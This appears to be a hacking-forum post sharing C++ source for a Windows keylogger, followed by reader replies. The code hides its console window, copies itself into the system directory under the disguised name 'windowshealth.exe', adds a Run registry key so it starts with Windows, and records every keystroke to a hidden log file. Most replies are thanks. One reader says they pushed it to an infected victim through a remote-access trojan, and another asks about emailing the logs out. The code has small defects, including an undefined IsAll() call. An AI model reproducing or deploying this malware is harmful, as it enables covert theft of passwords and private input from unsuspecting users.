#include <iostream>
#include <cstdlib>
#include <Windows.h>
#include <emu.h>

using namespace std;

char lpSystemDir[MAX_PATH];
char lpSystemFile[MAX_PATH];
char lpSystemLog[MAX_PATH];

BOOL IsLog();
BOOL IsCopyFile();
BOOL IsAutostart();
BOOL IsDummy();

void hidewindow();


int main()
{
hidewindow();

if(IsAll() == 1)
{
return 1;
}

IsDummy();
IsAutostart();
IsLog();
return 0;

}


void hidewindow()
{
FreeConsole();
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
}

BOOL IsDummy()
{
int number1 = 55;
int number2 = 30;

char str[10] = "blub";
string str2 = "hello";

printf("%s",str);
cout << str2 << endl;

return number1 * number2;
}

BOOL IsCopyFile()
{
char ownpath[MAX_PATH];

GetModuleFileName(0,ownpath,sizeof(ownpath));

if(CopyFile(ownpath, lpSystemFile, FALSE) == 0)
{
return 0;;
}

return 1;
}

BOOL IsAutostart()
{
GetSystemDirectory(lpSystemDir, sizeof(lpSystemDir));

strcpy(lpSystemFile,lpSystemDir);
strcat(lpSystemFile,"\\windowshealth.exe");

if(IsCopyFile() == 1)
{

HKEY key;

if(RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&key) == 0)
{
RegSetValueEx((HKEY)key,"windowshealth",0,REG_SZ,(BYTE *)lpSystemFile,strlen(lpSystemFile));
return 1;
}

}

return 0;
}

BOOL IsLog()
{
short comp;

while(1)
{

Sleep(15);

for(comp =8 ; comp <= 222; comp++)
{

if(GetAsyncKeyState(comp) == -32767)
{

strcpy(lpSystemLog,lpSystemDir);
strcat(lpSystemLog,"\\windowshealth.log");

FILE *file;
file=fopen(lpSystemLog,"a+");

if(file != NULL)
{

if( (comp >= 39) && (comp <= 64) )
{
fputc(comp,file);
fclose(file);
break;
}

else if( (comp > 64) && (comp < 91) )
{
comp+=32;
fputc(comp,file);
fclose(file);
break;
}

else
{

switch(comp)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;

case VK_RETURN:
fputs("\n",file);
fclose(file);
break;

case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;

case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;

case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;

case VK_CLEAR:
fputs("[CLEAR]",file);
fclose(file);
break;

case VK_MENU:
fputs("[ALT]",file);
fclose(file);
break;

case VK_PAUSE:
fputs("[PAUSE]",file);
fclose(file);
break;

case VK_ESCAPE:
fputs("[ESC]",file);
fclose(file);
break;

case VK_NEXT:
fputs("[PAGEDOWN]",file);
fclose(file);
break;

case VK_END:
fputs("[END]",file);
fclose(file);
break;

case VK_HOME:
fputs("[HOME]",file);
fclose(file);
break;

case VK_LEFT:
fputs("[LEFT]",file);
fclose(file);
break;

case VK_UP:
fputs("[UP]",file);
fclose(file);
break;

case VK_RIGHT:
fputs("[RIGHT]",file);
fclose(file);
break;

case VK_DOWN:
fputs("[DOWN]",file);
fclose(file);
break;

case VK_SELECT:
fputs("[SELECT]",file);
fclose(file);
break;

case VK_PRINT:
fputs("[PRINT]",file);
fclose(file);
break;

case VK_EXECUTE:
fputs("[EXECUTE]",file);
fclose(file);
break;

case VK_SNAPSHOT:
fputs("[SNAPSHOT]",file);
fclose(file);
break;

case VK_INSERT:
fputs("[INSERT]",file);
fclose(file);
break;

case VK_HELP:
fputs("[HELP]",file);
fclose(file);
break;

case VK_LWIN:
fputs("[LWIN]",file);
fclose(file);
break;

case VK_RWIN:
fputs("[RWIN]",file);
fclose(file);
break;

case VK_APPS:
fputs("[APPS]",file);
fclose(file);
break;

case VK_SLEEP:
fputs("[SLEEP]",file);
fclose(file);
break;

case 0x6C:
fputs("[SEPERATOR]",file);
fclose(file);
break;

case VK_SUBTRACT:
fputs("[SUBTRACT]",file);
fclose(file);
break;

case VK_MULTIPLY:
fputs("*",file);
fclose(file);
break;

case VK_ADD:
fputs("[ADD]",file);
fclose(file);
break;

case VK_DECIMAL:
fputs("[DECIMAL]",file);
fclose(file);
break;

case VK_DIVIDE:
fputs("/",file);
fclose(file);
break;

case VK_NUMLOCK:
fputs("[NUMLOCK]",file);
fclose(file);
break;

case VK_SCROLL:
fputs("[SCROLLLOCK]",file);
fclose(file);
break;

case VK_F1:
fputs("[F1]",file);
fclose(file);
break;

case VK_F2:
fputs("[F2]",file);
fclose(file);
break;

case VK_F3:
fputs("[F4]",file);
fclose(file);
break;

case VK_F4:
fputs("[F4]",file);
fclose(file);
break;

case VK_F5:
fputs("[F5]",file);
fclose(file);
break;

case VK_F6:
fputs("[F6]",file);
fclose(file);
break;

case VK_F7:
fputs("[F7]",file);
fclose(file);
break;

case VK_F8:
fputs("[F8]",file);
fclose(file);
break;

case VK_F9:
fputs("[F9]",file);
fclose(file);
break;

case VK_F10:
fputs("[F10]",file);
fclose(file);
break;

case VK_F11:
fputs("[F11]",file);
fclose(file);
break;

case VK_F12:
fputs("[F12]",file);
fclose(file);
break;

case VK_F13:
fputs("[F13]",file);
fclose(file);
break;

case VK_F14:
fputs("[F14]",file);
fclose(file);
break;

case VK_F15:
fputs("[F15]",file);
fclose(file);
break;

case VK_F16:
fputs("[F16]",file);
fclose(file);
break;

case VK_F17:
fputs("[F17]",file);
fclose(file);
break;

case VK_F18:
fputs("[F18]",file);
fclose(file);
break;

case VK_F19:
fputs("[F18]",file);
fclose(file);
break;

case VK_F20:
fputs("[F20]",file);
fclose(file);
break;

case VK_F21:
fputs("[F21]",file);
fclose(file);
break;

case VK_F22:
fputs("[F22]",file);
fclose(file);
break;

case VK_F23:
fputs("[F23]",file);
fclose(file);
break;

case VK_F24:
fputs("[F24]",file);
fclose(file);
break;

case VK_LSHIFT:
fputs("[LSHIFT]",file);
fclose(file);
break;

case VK_RSHIFT:
fputs("[RSHIFT]",file);
fclose(file);
break;

case VK_LCONTROL:
fputs("[LCONTROL]",file);
fclose(file);
break;

case VK_RCONTROL:
fputs("[RCONTROL]",file);
fclose(file);
break;

case VK_LMENU:
fputs("[LMENU]",file);
fclose(file);
break;

case VK_RMENU:
fputs("[RMENU]",file);
fclose(file);
break;

case 0xAD:
fputs("[VOLUMEMUTE]",file);
fclose(file);
break;

case VK_OEM_1:
fputs("[ ;-: ]",file);
fclose(file);
break;

case VK_OEM_2:
fputs("[ /-? ]",file);
fclose(file);
break;

case VK_OEM_3:
fputs("[`-~]",file);
fclose(file);
break;

case VK_OEM_4:
fputs("[ [-{ ]",file);
fclose(file);
break;

case VK_OEM_5:
fputs("[ \\-| ]",file);
fclose(file);
break;

case VK_OEM_6:
fputs("[ ]-} ]",file);
fclose(file);
break;

case VK_OEM_7:
fputs("[ '-\" ]",file);
fclose(file);
break;

case 0xE2:
fputs("[ BRACKET-\\ ]",file);
fclose(file);
break;

case VK_PLAY:
fputs("[PLAY]",file);
fclose(file);
break;

case VK_ZOOM:
fputs("[ZOOM]",file);
fclose(file);
break;

case 0xBB:
fputs("+",file);
fclose(file);
break;

case 0xBC:
fputs(",",file);
fclose(file);
break;

case 0xBD:
fputs("-",file);
fclose(file);
break;

case 0xBE:
fputs(".",file);
fclose(file);
break;

case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;

case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;

case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;

case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;

case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;

case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;

case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;

case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;

case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;

case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;

case VK_CAPITAL:
fputs("[CAPSLOCK]",file);
fclose(file);
break;

default:
fclose(file);
break;
}

}

}

}

}

}

return 1;
}

dont 4get say thx :)

thanks........

ty for sharing...

thanks.................

thnx brother

That was a good contribution. thanks.

Thanks for sharing.

great post man, keep it up

thanx
nice posting and sharing

thanks........................

Isn't GetAsyncKeyState() a highly detected method of grabbing key strokes? Also, it's a shame it doesn't support unicode. Why do you want people to say thanks? Pretty sure I've seen this skeleton a few hundred times.

I wouldlike to see if it`s possible to send them through email too ...

Sent it to some infected user of mine on my rat. Works great, I've tried this yesterday and had to post feedback now. The keylogger on my rat is not working well so this is pretty nice.

Damn this is crazy!!

easy tutorial, thanks

Thanks man.

nice posting and sharing thanksx

Thanx you.....

awesome, gracias dude

Thanks it ok

Thx brother!!

thanks.............................

thank u so much!!

couldve used this a few days ago but thanks :)

Thank You For sharing This.

nice code ! ty

thnk nuddy